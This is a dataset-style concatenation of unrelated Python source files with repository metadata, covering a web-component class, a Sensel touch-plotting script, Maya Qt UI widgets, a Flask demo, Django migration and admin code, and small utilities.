    return intersect(obj_pos_region, container)
@probRobScene.core.distributions.distributionFunction
def erode_container(container: Convex, obj_dims: Vector3D, obj_rot: Vector3D):
    """Shrink ``container`` so a box of ``obj_dims`` rotated by ``obj_rot`` fits."""
    obj_hsi = to_hsi(Cuboid(Vector3D(0.0, 0.0, 0.0), obj_rot, *obj_dims))
    container_hsi = to_hsi(container)
    return ConvexPolyhedron(erode_hsis(container_hsi, obj_hsi))
"craiginnes@gmail.com"
] | craiginnes@gmail.com |
706e98389051b53c21fed428b65f6748aea8884a | 18f8a1c7122c0b320f17ea31192439779a8c63e8 | /zoom/component.py | 4c33c561fec51ddfa4e1a08ca62ab77817d6130e | [
"MIT"
] | permissive | RyanLainchbury/zoom | d49afa8d3506fca2c6e426707bd60ba640420a45 | 684a16f4fe3cea3d26f2d520c743a871ca84ecc5 | refs/heads/master | 2020-12-25T19:03:12.881247 | 2017-06-09T07:29:27 | 2017-06-09T07:29:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,879 | py | """
zoom.component
Components encapsulate all of the parts that are required to make a
component appear on a page. This can include HTML, CSS and Javascript
parts and associated libraries.
Components parts are assembled in the way that kind of part
needs to be treated. For example HTML parts are simply joined
together in order and returned. CSS parts on the other hand are
joined together but any duplicate parts are ignored.
When a caller supplies JS or CSS as part of the component being assembled
these extra parts are submitted to the system to be included in thier
proper place within a response (typically a page template).
The Component object is currently experimental and is intended to be used
in future releases.
"""
import logging
import threading
from zoom.utils import OrderedSet, pp
# TODO: rename this to context (or system?)
composition = threading.local()
class Component(object):
    """component of a page response

    >>> c = Component()
    >>> c
    <Component: {'html': []}>
    >>> c += 'test'
    >>> c
    <Component: {'html': ['test']}>
    >>> c += dict(css='mycss')
    >>> c
    <Component: {'css': OrderedSet(['mycss']), 'html': ['test']}>
    >>> c += dict(css='mycss')
    >>> c
    <Component: {'css': OrderedSet(['mycss']), 'html': ['test']}>
    >>> c += 'test2'
    >>> sorted(c.parts.items())
    [('css', OrderedSet(['mycss'])), ('html', ['test', 'test2'])]
    >>> Component() + 'test1' + 'test2'
    <Component: {'html': ['test1', 'test2']}>
    >>> Component() + 'test1' + dict(css='mycss')
    <Component: {'css': OrderedSet(['mycss']), 'html': ['test1']}>
    >>> Component('test1', Component('test2'))
    <Component: {'html': ['test1', 'test2']}>
    >>> Component(
    ...     Component('test1', css='css1'),
    ...     Component('test2', Component('test3', css='css3')),
    ... )
    <Component: {'css': OrderedSet(['css1', 'css3']), 'html': ['test1', 'test2', 'test3']}>
    >>> Component((Component('test1', css='css1'), Component('test2', css='css2')))
    <Component: {'css': OrderedSet(['css1', 'css2']), 'html': ['test1', 'test2']}>
    >>> Component(Component('test1', css='css1'), Component('test2', css='css2'))
    <Component: {'css': OrderedSet(['css1', 'css2']), 'html': ['test1', 'test2']}>
    >>> composition.parts = Component()
    >>> c = Component(Component('test1', css='css1'), Component('test2', css='css2'))
    >>> c.render()
    'test1test2'
    >>> page2 = \\
    ...     Component() + \\
    ...     '<h1>Title</h1>' + \\
    ...     dict(css='mycss') + \\
    ...     dict(js='myjs') + \\
    ...     'page body goes here'
    >>> t = (
    ...     "<Component: {'css': OrderedSet(['mycss']), "
    ...     "'html': ['<h1>Title</h1>', 'page body goes here'], "
    ...     "'js': OrderedSet(['myjs'])}>"
    ... )
    >>> #print(repr(page2) + '\\n' + t)
    >>> repr(page2) == t
    True
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, *args, **kwargs):
        """construct a Component

        >>> Component()
        <Component: {'html': []}>
        >>> Component('body')
        <Component: {'html': ['body']}>
        >>> Component('body', css='css1')
        <Component: {'css': OrderedSet(['css1']), 'html': ['body']}>
        >>> t = Component('body', css='css1', js='js1')
        >>> repr(t) == (
        ...     "<Component: {"
        ...     "'css': OrderedSet(['css1']), "
        ...     "'html': ['body'], "
        ...     "'js': OrderedSet(['js1'])"
        ...     "}>"
        ... )
        True
        """
        def is_iterable(obj):
            """Returns True if object is an iterable but not a string"""
            return hasattr(obj, '__iter__') and not isinstance(obj, str)
        def flatten(items):
            """Returns list of items with sublists incorporated into list"""
            items_as_iterables = list(is_iterable(i) and i or (i,) for i in items)
            return [i for j in items_as_iterables for i in j]
        # 'html' parts keep insertion order and may repeat; other part kinds
        # (css, js, ...) are created lazily as OrderedSets in __iadd__.
        self.parts = {
            'html': [],
        }
        for arg in flatten(args):
            self += arg
        self += kwargs
    def __iadd__(self, other):
        """add something to a component

        Accepts a string (appended to html), a dict of named parts, or
        another Component (parts merged key by key).

        >>> page = Component('<h1>Title</h1>')
        >>> page += dict(css='mycss')
        >>> page += 'page body goes here'
        >>> page += dict(js='myjs')
        >>> result = (
        ...     "<Component: {"
        ...     "'css': OrderedSet(['mycss']), "
        ...     "'html': ['<h1>Title</h1>', 'page body goes here'], "
        ...     "'js': OrderedSet(['myjs'])"
        ...     "}>"
        ... )
        >>> #print(page)
        >>> #print(result)
        >>> result == repr(page)
        True
        >>> page = Component('test')
        >>> page += dict(html='text')
        >>> page
        <Component: {'html': ['test', 'text']}>
        """
        def rendered(obj):
            """call the render method if necessary"""
            if not isinstance(obj, Component) and hasattr(obj, 'render'):
                return obj.render()
            return obj
        other = rendered(other)
        if isinstance(other, str):
            self.parts['html'].append(other)
        elif isinstance(other, dict):
            for key, value in other.items():
                part = self.parts.setdefault(key, OrderedSet())
                if key == 'html':
                    # html accumulates in order and may contain duplicates
                    if isinstance(value, list):
                        part.extend(value)
                    else:
                        part.append(value)
                else:
                    # non-html parts de-duplicate via OrderedSet union
                    if isinstance(value, list):
                        part |= value
                    else:
                        part |= [value]
        elif isinstance(other, Component):
            for key, value in other.parts.items():
                part = self.parts.setdefault(key, OrderedSet())
                if key == 'html':
                    part.extend(value)
                else:
                    part |= value
        return self
    def __add__(self, other):
        """add a component to something else

        >>> (Component() + 'test1' + dict(css='mycss')) + 'test2'
        <Component: {'css': OrderedSet(['mycss']), 'html': ['test1', 'test2']}>
        >>> Component() + 'test1' + dict(css='mycss') + dict(css='css2')
        <Component: {'css': OrderedSet(['mycss', 'css2']), 'html': ['test1']}>
        """
        result = Component()
        result += self
        result += other
        return result
    def __repr__(self):
        # parts are shown sorted by key so the repr is deterministic
        return '<Component: {{{}}}>'.format(
            ', '.join(
                '{!r}: {!r}'.format(i, j)
                for i, j in sorted(self.parts.items())
            )
        )
    def render(self):
        """renders the component"""
        # Side effect: publish non-html parts (css, js, ...) to the
        # thread-local composition for inclusion in the page template.
        composition.parts += self
        return ''.join(self.parts['html'])
    def __str__(self):
        return self.render()
# Lowercase alias kept for backwards compatibility with older call sites.
component = Component


def compose(*args, **kwargs):
    """Compose a response - DEPRECATED: prefer building a Component directly.

    Keyword arguments become non-html parts registered on the thread-local
    composition; positional strings are concatenated and returned.
    """
    composition.parts += Component(**kwargs)
    return ''.join(args)
def handler(request, handler, *rest):
    """Component handler"""
    # Pop any flash-style alerts stored on the session by a previous request
    # so each alert is delivered exactly once.
    pop = request.session.__dict__.pop
    composition.parts = Component(
        success=pop('system_successes', []),
        warning=pop('system_warnings', []),
        error=pop('system_errors', []),
    )
    result = handler(request, *rest)
    logger = logging.getLogger(__name__)
    logger.debug('component middleware')
    # Any alerts raised while handling this request are written back to the
    # session so the *next* request can display them.
    # TODO: clean this up, use a single alerts list with an alert type value
    success_alerts = composition.parts.parts.get('success')
    if success_alerts:
        if not hasattr(request.session, 'system_successes'):
            request.session.system_successes = []
        request.session.system_successes = list(success_alerts)
    warning_alerts = composition.parts.parts.get('warning')
    if warning_alerts:
        if not hasattr(request.session, 'system_warnings'):
            request.session.system_warnings = []
        request.session.system_warnings = list(warning_alerts)
    error_alerts = composition.parts.parts.get('error')
    if error_alerts:
        if not hasattr(request.session, 'system_errors'):
            request.session.system_errors = []
        request.session.system_errors = list(error_alerts)
    return result
# def component(*args, **kwargs):
# """assemble parts of a component
#
# >>> system.setup()
# >>> system.css
# OrderedSet()
#
# >>> component('test', css='mycss')
# 'test'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component(100, css='mycss')
# '100'
#
# >>> component(css='mycss', html='test')
# 'test'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component('test', html='more', css='mycss')
# 'testmore'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component('test', 'two', css=['mycss','css2'], js='myjs')
# 'testtwo'
# >>> system.css
# OrderedSet(['mycss', 'css2'])
# >>> system.js
# OrderedSet(['myjs'])
#
# >>> component('test', js='js2')
# 'test'
# >>> system.js
# OrderedSet(['myjs', 'js2'])
#
# >>> component(['test1'], ('test2',), 'test3')
# 'test1test2test3'
#
# >>> from mvc import DynamicView
# >>> class MyThing(DynamicView):
# ... def __str__(self):
# ... return self.model
# >>> hasattr(MyThing('test'), '__iter__')
# False
# >>> component(['test1'], ('test2',), 'test3', MyThing('test4'))
# 'test1test2test3test4'
# >>> component(MyThing('test4'))
# 'test4'
# >>> component(MyThing('test4'), MyThing('test5'))
# 'test4test5'
# >>> component((MyThing('test4'), MyThing('test5')))
# 'test4test5'
# >>> args = (MyThing('test4'), MyThing('test5'))
# >>> component(args)
# 'test4test5'
# >>> component(*list(args))
# 'test4test5'
#
# >>> system.setup()
# >>> component('test', js=[])
# 'test'
# >>> system.js
# OrderedSet()
# """
# def is_iterable(item):
# return hasattr(item, '__iter__')
#
# def as_iterable(item):
# return not is_iterable(item) and (item,) or item
#
# def flatten(items):
# items_as_iterables = list(is_iterable(i) and i or (i,) for i in items)
# return [i for j in items_as_iterables for i in j]
#
# parts = {
# 'html': flatten(args),
# }
# for key, value in kwargs.items():
# part = parts.setdefault(key, OrderedSet())
# if key == 'html':
# part.extend(as_iterable(value))
# else:
# part |= OrderedSet(as_iterable(value))
# for key in ['css', 'js', 'styles', 'libs', 'head', 'tail']:
# part = getattr(system, key)
# part |= parts.get(key, [])
# return ''.join(map(str, parts['html']))
| [
"herb@dynamic-solutions.com"
] | herb@dynamic-solutions.com |
267bb492f6f1d1c52316995189ee560e6d5fac8b | cbbd5ae034bfc4a81a49af0fb7712516136afa6a | /PycharmProjects/Sensel/MISC/plot_contact_point_dynamic.py | c9c6a4d57c05bf7f73c33ae49037fdcb550ba242 | [] | no_license | pratikaher88/SenselWork | fafe12037ae8349510f29b3dc60130d26992ea77 | d6f17bca7d2ac6ec6621f9b1b1540ca9e80eb2f7 | refs/heads/master | 2020-03-22T09:12:19.559029 | 2019-09-08T19:25:15 | 2019-09-08T19:25:15 | 139,822,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,496 | py | #!/usr/bin/env python
##########################################################################
# MIT License
#
# Copyright (c) 2013-2017 Sensel, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
##########################################################################
import sys
from SenselUse import sensel,sensel_register_map
import binascii
import threading
import matplotlib.pyplot as plt
from matplotlib import animation
from matplotlib import style
style.use('fivethirtyeight')
fig=plt.figure()
ax1=fig.add_subplot(1,1,1)
# NOTE(review): 'global' at module scope is a no-op; the effective
# declaration lives inside waitForEnter().
global enter_pressed
# Accumulated contact coordinates; appended to by printFrame().
X=[]
Y=[]
def waitForEnter():
    """Block until the user presses Enter, then flag the scan loop to stop."""
    global enter_pressed
    input("Press Enter to exit...")
    enter_pressed = True
def openSensel():
    """Open the first detected Sensel device; returns None if none attached."""
    (error, device_list) = sensel.getDeviceList()
    if device_list.num_devices == 0:
        return None
    (error, handle) = sensel.openDeviceByID(device_list.devices[0].idx)
    return handle
def initFrame():
    """Configure frame content and contact masks, then start scanning."""
    sensel.setFrameContent(
        handle,
        sensel.FRAME_CONTENT_PRESSURE_MASK | sensel.FRAME_CONTENT_CONTACTS_MASK,
    )
    sensel.setContactsMask(
        handle,
        sensel.CONTACT_MASK_ELLIPSE | sensel.CONTACT_MASK_BOUNDING_BOX,
    )
    (error, frame) = sensel.allocateFrameData(handle)
    sensel.startScanning(handle)
    return frame
# def initFrameForContacts():
# error = sensel.setFrameContent(handle, sensel.FRAME_CONTENT_CONTACTS_MASK)
# (error, frame) = sensel.allocateFrameData(handle)
# error = sensel.startScanning(handle)
# return frame
def scanFrames(frame, info):
    """Drain every frame currently buffered on the device and print each one."""
    sensel.readSensor(handle)
    (error, num_frames) = sensel.getNumAvailableFrames(handle)
    for _ in range(num_frames):
        sensel.getFrame(handle, frame)
        printFrame(frame, info)
def printFrame(frame, info):
    """Print per-contact info, total force, and live-plot the contact trail."""
    # total_force = 0.0
    # for n in range(info.num_rows * info.num_cols):
    #     total_force += frame.force_array[n]
    # print("Total Force: " + str(total_force))
    if frame.n_contacts > 0:
        print("\nNum Contacts: ", frame.n_contacts)
        for n in range(frame.n_contacts):
            c = frame.contacts[n]
            print("Contact ID: ", c.id)
            print("X_pos",c.x_pos)
            print("Y_pos",c.y_pos)
            X.append(c.x_pos)
            Y.append(c.y_pos)
            plt.ion()
            # Redraws the whole trail from scratch on every contact, so the
            # animation gets slower as X/Y grow (O(n^2) over the session).
            animated_plot = plt.plot(X, Y, 'ro')[0]
            for i in range(len(X)):
                animated_plot.set_xdata(X[0:i])
                animated_plot.set_ydata(Y[0:i])
                plt.draw()
                plt.pause(0.0001)
            # f = open('sampleText', 'a')
            # f.write(str(c.x_pos)+','+str(c.y_pos)+'\n')
            # animate(c.x_pos,c.y_pos)
            # plt.scatter(c.x_pos, c.y_pos)
            # ani = animation.FuncAnimation(plt.figure(), plt.scatter(c.x_pos,c.y_pos), interval=1000)
            # plt.show(block=False)
            total_force = 0.0
            # NOTE(review): this inner loop reuses variable 'n', shadowing the
            # contact index above; harmless because the outer for reassigns n,
            # but worth renaming.
            for n in range(info.num_rows * info.num_cols):
                total_force += frame.force_array[n]
            print("Total Force", total_force)
            # Light the device LED for the duration of each contact.
            if c.state == sensel.CONTACT_START:
                sensel.setLEDBrightness(handle, c.id, 100)
            # Gives force at contact begin
            # for n in range(info.num_rows * info.num_cols):
            #     total_force += frame.force_array[n]
            elif c.state == sensel.CONTACT_END:
                sensel.setLEDBrightness(handle, c.id, 0)
def closeSensel(frame):
    """Free the frame data, stop scanning and close the device handle."""
    sensel.freeFrameData(handle, frame)
    sensel.stopScanning(handle)
    sensel.close(handle)
if __name__ == "__main__":
    # NOTE(review): 'global' at top level is a no-op; enter_pressed is just a
    # module-level flag toggled by the waitForEnter thread.
    global enter_pressed
    enter_pressed = False
    # Axis limits presumably match the sensor's active area — TODO confirm.
    plt.xlim(0, 230)
    plt.ylim(0, 130)
    # plt.scatter(X, Y)
    plt.gca().invert_yaxis()
    # plt.show(block=False)
    handle = openSensel()
    if handle != None:
        (error, info) = sensel.getSensorInfo(handle)
        frame = initFrame()
        # Background thread flips enter_pressed when the user hits Enter,
        # which ends the scan loop below.
        t = threading.Thread(target=waitForEnter)
        t.start()
        while (enter_pressed == False):
            scanFrames(frame, info)
        closeSensel(frame)
        # plt.xlim(0, 230)
        # plt.ylim(0, 130)
        plt.scatter(X, Y)
        # plt.gca().invert_yaxis()
        # ani = animation.FuncAnimation(fig, animatethis, interval=1000)
        # plt.show()
        # with open('sampleText', "w"):
        #     pass
        print(X)
        print(Y)
| [
"pratikaher88@gmail.com"
] | pratikaher88@gmail.com |
aa508394ac52f05763dfa20934d3dfac4bbab93a | ef74156399cbc4b58732ecbc1f62f25597e503dd | /scripts/ryu/connection.py | e557e8903033d1431425882955770a66f1f6d89c | [
"Apache-2.0"
] | permissive | martinoravsky/ryu | 138dcc9fcd3c94b9e764742f576c42e4ce98ec43 | 236d761b802398efecec02b36329a16378600712 | refs/heads/master | 2021-09-13T00:50:09.705531 | 2018-04-23T12:16:49 | 2018-04-23T12:16:49 | 107,885,767 | 0 | 0 | null | 2017-10-22T17:06:36 | 2017-10-22T17:06:36 | null | UTF-8 | Python | false | false | 185 | py | import mysql
def connect():
    """Open and return a connection to the 'mptcp' MySQL database.

    Fix: the module only does ``import mysql`` at the top, which does not
    load the ``mysql.connector`` subpackage, so the call below failed with
    AttributeError. Import the submodule explicitly here.
    """
    import mysql.connector

    # NOTE(review): host and credentials are hard-coded; move them to
    # configuration or environment variables before production use.
    conn = mysql.connector.connect(host='192.168.56.101',
                                   database='mptcp',
                                   user='mptcp',
                                   password='mptcp123')
    return conn
"martinoravskyjr@gmail.com"
] | martinoravskyjr@gmail.com |
a3c12641a2a38ce54c6fe2aef9dff85dc74d8a75 | ccc55c7a05cd115e029f04cd577b11b70d0d3fdc | /Chapter 2/D4 TI B/Dyning Aida Batrishya(1184030)/src/NPM9.py | bdfe66bce59887e5a9ba35766fa55636df459a63 | [
"MIT"
] | permissive | ariqrafikusumah/Tugas | 6019be8c3219c930730d29076efd4494a3c70c79 | 6903117a91ad3002033c6d0297b4d1d06903088d | refs/heads/master | 2020-09-15T19:51:29.066553 | 2020-02-29T12:08:36 | 2020-02-29T12:08:36 | 216,065,279 | 0 | 0 | null | 2019-10-18T16:28:46 | 2019-10-18T16:28:45 | null | UTF-8 | Python | false | false | 529 | py | # -*- coding: utf-8 -*-
"""
@author: ASS
"""
# Keep prompting until the NPM (student number) is exactly 7 digits long.
NPM = input("berapa npm kamu : ")
while True:
    if len(NPM) < 7:
        print("Npmnya kurang dari 7 digit")
        NPM = input("Npm kamu : ")
    elif len(NPM) > 7:
        print("Npm lebih dari 7 digit")
        NPM = input("Npm kamu: ")
    else:
        break

# Print every even digit separated by spaces, showing zero as a blank.
for digit in NPM:
    if int(digit) % 2 == 0:
        print("" if int(digit) == 0 else digit, end=" ")
"aida.batrishya@gmail.com"
] | aida.batrishya@gmail.com |
0f5724a7f2cdf98f3c4f9d0122f6cec69aa538ff | 7161f06c0b57711f788d664709f78456d11e9a1b | /Python/flask_fundamentals/hello_flask/server2.py | e840f4f1f0ab33945ccf3ec9922ecedf25c47be2 | [] | no_license | yaronlevi1/CDcode | b00a51a33c43355d4ea53661c065a2cd8641b785 | 4dc925283715d4dd66733353491d49454865d68c | refs/heads/master | 2022-12-02T04:34:08.044682 | 2018-03-15T19:52:15 | 2018-03-15T19:52:15 | 120,852,330 | 0 | 1 | null | 2022-11-28T03:57:53 | 2018-02-09T03:37:37 | Python | UTF-8 | Python | false | false | 386 | py | from flask import Flask, render_template, request, redirect
app = Flask(__name__)


@app.route('/users/<username>')
def show_user_profile(username):
    """Render the success page for /users/<username>."""
    print(username)
    return render_template("success.html")


@app.route('/users/<username>/<id>')
def show_user_profile2(username, id):
    """Render the success page for /users/<username>/<id>."""
    # 'id' shadows the builtin, but the name must match the URL variable.
    print(username)
    print(id)
    return render_template("success.html")


# Fix: only start the dev server when run as a script, not at import time
# (e.g. when loaded by a WSGI server or a test).
if __name__ == '__main__':
    app.run(debug=True)
"yaronlevi1@gmail.com"
] | yaronlevi1@gmail.com |
4c533330fc30bad9170734f0a1c30bbcfc8d9a59 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190117213541.py | 1cc9c0f906fa3ff3efcc249cec01387c59eb07fa | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,830 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
    """Load a Qt Designer .ui file and return (form_class, base_class).

    Uses PyQt's uic directly when available; otherwise compiles the .ui XML
    with pyside(2)uic into Python source and exec's it to recover the
    generated classes. (Python 2 only: uses 'exec ... in' and cStringIO.)
    """
    import plugin.Qt as Qt
    if Qt.__binding__.startswith('PyQt'):
        from Qt import _uic as uic
        return uic.loadUiType(uiFile)
    elif Qt.__binding__ == 'PySide':
        import pysideuic as uic
    else:
        import pyside2uic as uic
    import xml.etree.ElementTree as xml
    from cStringIO import StringIO
    parsed = xml.parse(uiFile)
    widget_class = parsed.find('widget').get('class')
    form_class = parsed.find('class').text
    with open(uiFile, 'r') as f:
        o = StringIO()
        frame = {}
        uic.compileUi(f, o, indent=0)
        pyc = compile(o.getvalue(), '<string>', 'exec')
        exec pyc in frame
        # Fetch the base_class and form class based on their type
        # in the xml from designer
        form_class = frame['Ui_%s'%form_class]
        # eval resolves the widget class name (e.g. QWidget) from the
        # Qt names imported at module level.
        base_class = eval('%s'%widget_class)
    return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item_Layout(form_class,base_class):
    """Container widget managing a dynamic list of Cam_Item rows."""

    def __init__(self):
        super(Cam_Item_Layout,self).__init__()
        self.setupUi(self)
        self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
        self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)

    def Item_Add_Fn(self):
        # The Cam_Item constructor inserts itself into Item_Layout.
        Cam_Item(self)

    def Item_Clear_Fn(self):
        # Child 0 is the layout object itself; delete every item after it.
        for index, child in enumerate(self.Item_Layout.children()):
            if index != 0:
                child.deleteLater()
# Re-point at the per-item .ui file and compile it for the Cam_Item class below.
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class, base_class):
    """A single camera entry; inserts itself into the parent's Item_Layout."""

    def __init__(self, parent):
        super(Cam_Item, self).__init__()
        self.setupUi(self)
        self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
        # children() includes the layout object itself at index 0, so the
        # current child count doubles as this item's 1-based index.
        TotalCount = len(parent.Item_Layout.children())
        parent.Item_Layout.layout().insertWidget(TotalCount - 1, self)
        self.Cam_LE.setText("Cam_Item_%s" % TotalCount)
        self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
        self.setObjectName("Cam_Item_%s" % TotalCount)
        self.num = TotalCount

    def Cam_Del_BTN_Fn(self):
        """Delete this item and renumber the remaining siblings."""
        self.deleteLater()
        # NOTE: deleteLater() is deferred, so this widget is still present in
        # the sibling list while we renumber.
        ChildrenList = self.parent().children()
        for i, child in enumerate(ChildrenList):
            if i == 0:
                # First child is the layout object, not a Cam_Item — the
                # original code touched it and would raise AttributeError.
                continue
            if i < self.num:
                # BUG FIX: the original wrote '"Cam_Item_%s" % i-1', which
                # binds as ('..%s' % i) - 1 and raises TypeError. Parenthesize.
                child.Cam_Num_Label.setText(u"镜头%s" % (i - 1))
                child.setObjectName("Cam_Item_%s" % (i - 1))
            else:
                child.Cam_Num_Label.setText(u"镜头%s" % i)
                child.setObjectName("Cam_Item_%s" % i)
| [
"2595715768@qq.com"
] | 2595715768@qq.com |
b4452af8858336844e7ecd9620be68d208465a26 | f33316e25f0a867d4bf3dc054d8ac133520e322d | /orders/migrations/0001_initial.py | 6ebfdeb7598fbf46739883d752b97b6340ebbf50 | [] | no_license | blingstand/lengow_test | ac2338e44fb92a4f4b6d8ac1b878d3906332806b | 1939048587b6537d9b7132f932f6d182aa5dd09e | refs/heads/master | 2020-06-23T23:25:53.030690 | 2019-07-25T07:49:18 | 2019-07-25T07:49:18 | 198,783,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | # Generated by Django 2.2.3 on 2019-07-25 07:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the orders app."""

    # First migration for this app; depends on nothing.
    initial = True

    dependencies = [
    ]

    operations = [
        # Lookup table of marketplaces.
        migrations.CreateModel(
            name='Marketplace',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
            ],
        ),
        # Order status, carrying both the marketplace's and Lengow's labels.
        migrations.CreateModel(
            name='Status',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('marketplace', models.CharField(max_length=100)),
                ('lengow', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_hour', models.DateTimeField(verbose_name='Date de la commande')),
                ('amount', models.CharField(max_length=100)),
                ('marketplace_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Marketplace')),
                # NOTE(review): a FK named 'order_id' targeting Status looks
                # misnamed (expected something like 'status') — verify model.
                ('order_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Status')),
            ],
            options={
                'ordering': ['date_hour'],
            },
        ),
    ]
| [
"blingstand@hotmail.fr"
] | blingstand@hotmail.fr |
eb10bfb466bab9a81ea4d387369ee01657e46451 | 1850dac6af5c111f0b45542dbdd15abbfc91471f | /utils/security.py | 17834c0c02246d6bba73f2bde5ee2c05d6a0c70e | [] | no_license | leonbaraza/User-Management | 7551586c188c20a18f0db36048c22ce58da48b47 | 8f9658fe41f123d8f009e81e5be96dceb4f49d23 | refs/heads/master | 2023-03-17T10:20:42.149434 | 2020-04-18T04:44:04 | 2020-04-18T04:44:04 | 256,582,339 | 0 | 0 | null | 2021-03-20T03:34:41 | 2020-04-17T18:39:14 | HTML | UTF-8 | Python | false | false | 125 | py | from itsdangerous import URLSafeTimedSerializer
from app import app
# Module-level serializer for signing time-limited tokens (e.g. email
# confirmation links), keyed on the Flask app's SECRET_KEY.
ts = URLSafeTimedSerializer(app.config['SECRET_KEY'])
| [
"leonbaraza@gmail.com"
] | leonbaraza@gmail.com |
cf24680305aff81ff86ab5ebb28a06a585343af1 | cbfddfdf5c7fa8354162efe50b41f84e55aff118 | /venv/lib/python3.7/site-packages/apscheduler/executors/debug.py | ac739aebcef52bb0b824e66c1fcfc7693b4fab6a | [
"MIT",
"Apache-2.0"
] | permissive | tclerico/SAAC | 8d2245221dd135aea67c5e079ac7eaf542b25e2f | 2f52007ae8043096662e76da828a84e87f71091e | refs/heads/master | 2022-12-09T21:56:33.430404 | 2019-02-20T14:23:51 | 2019-02-20T14:23:51 | 153,152,229 | 3 | 0 | MIT | 2022-09-16T17:52:47 | 2018-10-15T17:13:29 | Python | UTF-8 | Python | false | false | 573 | py | import sys
from apscheduler.executors.base import BaseExecutor, run_job
class DebugExecutor(BaseExecutor):
    """
    A special executor that executes the target callable directly instead of deferring it to a
    thread or process.

    Plugin alias: ``debug``
    """

    def _do_submit_job(self, job, run_times):
        # Run synchronously in the caller's thread; report the outcome through
        # the base-class success/error hooks exactly like the async executors.
        try:
            result = run_job(job, job._jobstore_alias, run_times, self._logger.name)
        except BaseException:
            exc_value, exc_tb = sys.exc_info()[1:]
            self._run_job_error(job.id, exc_value, exc_tb)
        else:
            self._run_job_success(job.id, result)
| [
"timclerico@gmail.com"
] | timclerico@gmail.com |
7f5868db1af43cb9124e4dfb9aa8350807e5364c | 774adf830542c6dfe461d652120631f0cbd102a0 | /auctions/admin.py | 57b0a9d64787dcecbb5a6214aacc8353b42104d2 | [] | no_license | Idris01/learn | 1ebf404af26bb1cea23f51175d9e49bb31cb720c | b8481a075df65acd01848765116478c08dff8cc5 | refs/heads/master | 2023-01-05T06:25:18.851366 | 2020-11-05T17:14:35 | 2020-11-05T17:14:35 | 310,609,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | from django.contrib import admin
from django.contrib.admin import ModelAdmin
from . models import User, Listing, Bid,Comment, Winners
# Register your models here.
@admin.register(User)
class UserAdmin(ModelAdmin):
pass
@admin.register(Listing)
class ListingAdmin(ModelAdmin):
pass
@admin.register(Bid)
class BidAdmin(ModelAdmin):
pass
@admin.register(Comment)
class CommentAdmin(ModelAdmin):
pass
@admin.register(Winners)
class WinnersAdmin(ModelAdmin):
pass | [
"idrys01@gmail.com"
] | idrys01@gmail.com |
e0dc3ae013b13e56a10d616089abddf43297f87c | 31eec231283a5ff66241a3fa5370f60f04a58200 | /pyhighlighter.py | 9e22bd927823ae00484b1195753da7999444762a | [] | no_license | zhhrozhh/pyzzle | 93cf53e56b369aba5ca63324c2ea4ba2b1ff0cef | a96dd9690ef11e88d5accca5bfa8ccf41500d036 | refs/heads/master | 2021-01-13T11:31:58.963307 | 2017-01-02T06:46:23 | 2017-01-02T06:46:23 | 77,775,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,977 | py | #http://stackoverflow.com/questions/26679515/how-to-update-qsyntaxhighlighter-color-coding-when-user-changes-text
import sys
